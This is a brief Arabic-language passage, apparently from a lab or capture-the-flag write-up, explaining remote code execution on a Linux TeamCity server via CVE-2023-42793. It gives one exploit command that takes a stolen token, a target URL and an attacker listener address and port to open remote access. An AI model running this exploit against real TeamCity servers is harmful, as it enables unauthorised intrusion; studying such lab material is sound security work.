
TeamCity RCE لنظام Linux (CVE-2023-42793)
ستحتاج أولاً إلى الحصول على الرمز (token) باستخدام استغلال مختلف. ومع ذلك، سيمنحك الاستغلال التالي صلاحية تنفيذ الأوامر عن بُعد (RCE) على خادم Linux، حيث يقوم بتشفير الحمولة في عنوان URL وإرسالها إلى الخادم.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT